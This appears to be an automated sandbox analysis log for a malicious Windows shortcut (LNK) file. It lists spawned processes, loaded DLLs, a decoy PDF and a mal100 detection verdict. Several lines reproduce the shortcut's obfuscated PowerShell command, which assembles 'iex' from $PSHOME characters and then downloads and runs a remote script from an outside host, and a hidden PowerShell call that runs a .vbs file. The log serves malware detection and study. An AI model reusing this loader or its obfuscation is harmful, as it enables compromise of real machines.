      Source: 0bNBLjPn56.lnkLNK file: ${kilo4z} = $PSHOME;${*opso25.} = ${kilo4z}[+52 -53 +1] + ${kilo4z}[-11 +2] + 'A' + ${kilo4z}[-66 +55];${o5d.} = $([TYPE]${*opso25.});${*.f2iuzg.} = ${o5d.}::ToString(+79 -1 -5)+${o5d.}::ToString(+79 -1 -5 -4)+${o5d.}::ToString(+79 +30 -10 +21);&(${*.f2iuzg.})(&(${*.f2iuzg.})(${kilo4z}[+52 -53 +1]+'u'+${kilo4z}[-66 +55]+${kilo4z}[-61 +55]+' https://www.al-rasikh.com/ms/neaters.txt -UseBasicParsing'))
      Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD33FA4CFA2_2_00007FFD33FA4CFA
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD33FA73D12_2_00007FFD33FA73D1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD33FA2BF82_2_00007FFD33FA2BF8
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD33FA68522_2_00007FFD33FA6852
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD34079C6D2_2_00007FFD34079C6D
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD340708992_2_00007FFD34070899
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD34072F092_2_00007FFD34072F09
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD3407199D2_2_00007FFD3407199D
      Source: classification engineClassification label: mal100.evad.winLNK@20/58@5/3
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Desktop\List of Required items and services.pdfJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dinjlwzf.pvg.ps1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden C:\Windows\System32\WindowsPowerShell\v1.0=iex "[Environment]::GetEnvironmentVariable('public') + '\\f2iuzg.vbs'"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
      Source: 0bNBLjPn56.lnkVirustotal: Detection: 25%
      Source: 0bNBLjPn56.lnkReversingLabs: Detection: 28%
      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" ${kilo4z} = $PSHOME;${*opso25.} = ${kilo4z}[+52 -53 +1] + ${kilo4z}[-11 +2] + 'A' + ${kilo4z}[-66 +55];${o5d.} = $([TYPE]${*opso25.});${*.f2iuzg.} = ${o5d.}::ToString(+79 -1 -5)+${o5d.}::ToString(+79 -1 -5 -4)+${o5d.}::ToString(+79 +30 -10 +21);&(${*.f2iuzg.})(&(${*.f2iuzg.})(${kilo4z}[+52 -53 +1]+'u'+${kilo4z}[-66 +55]+${kilo4z}[-61 +55]+' https://www.al-rasikh.com/ms/neaters.txt -UseBasicParsing'))
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden C:\Windows\System32\WindowsPowerShell\v1.0=iex "[Environment]::GetEnvironmentVariable('public') + '\\f2iuzg.vbs'"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\List of Required items and services.pdf"
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2096 --field-trial-handle=1760,i,5841402874270245853,5687332266173655936,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden C:\Windows\System32\WindowsPowerShell\v1.0=iex "[Environment]::GetEnvironmentVariable('public') + '\\f2iuzg.vbs'"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\List of Required items and services.pdf"Jump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2096 --field-trial-handle=1760,i,5841402874270245853,5687332266173655936,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdatauser.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dlnashext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wpdshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
      Source: 0bNBLjPn56.lnkLNK file: ..\..\..\..\windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
      Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000002.00000002.2451470735.0000026B35E89000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.2269740507.0000027DEE1D0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2269229094.0000027DEDF4F000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000002.00000002.2451470735.0000026B35DEC000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.pdbe35 source: powershell.exe, 00000002.00000002.2451470735.0000026B35E89000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.pdb source: powershell.exe, 00000002.00000002.2353829592.0000026B1BAD5000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbP%tn source: powershell.exe, 00000002.00000002.2451470735.0000026B35E89000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: n.pdb source: powershell.exe, 00000006.00000002.2269468726.0000027DEDFEC000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000002.00000002.2451470735.0000026B35DEC000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbbP source: powershell.exe, 00000002.00000002.2451470735.0000026B35E89000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000002.00000002.2451470735.0000026B35DEC000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.2269468726.0000027DEE015000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb# source: powershell.exe, 00000002.00000002.2451470735.0000026B35E4E000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ion.pdb source: powershell.exe, 00000006.00000002.2269468726.0000027DEE015000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbk source: powershell.exe, 00000002.00000002.2451470735.0000026B35DEC000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.pdbment.Automation.pdbn# source: powershell.exe, 00000002.00000002.2353829592.0000026B1BA87000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\mscorlib.pdb= source: powershell.exe, 00000002.00000002.2451470735.0000026B35DEC000.00000004.00000020.00020000.00000000.sdmp

      Data Obfuscation

      barindex
      Obfuscated command line found
      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" ${kilo4z} = $PSHOME;${*opso25.} = ${kilo4z}[+52 -53 +1] + ${kilo4z}[-11 +2] + 'A' + ${kilo4z}[-66 +55];${o5d.} = $([TYPE]${*opso25.});${*.f2iuzg.} = ${o5d.}::ToString(+79 -1 -5)+${o5d.}::ToString(+79 -1 -5 -4)+${o5d.}::ToString(+79 +30 -10 +21);&(${*.f2iuzg.})(&(${*.f2iuzg.})(${kilo4z}[+52 -53 +1]+'u'+${kilo4z}[-66 +55]+${kilo4z}[-61 +55]+' https://www.al-rasikh.com/ms/neaters.txt -UseBasicParsing'))

      Persistence and Installation Behavior

      barindex
      Windows shortcut file (LNK) starts blacklisted processes
      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
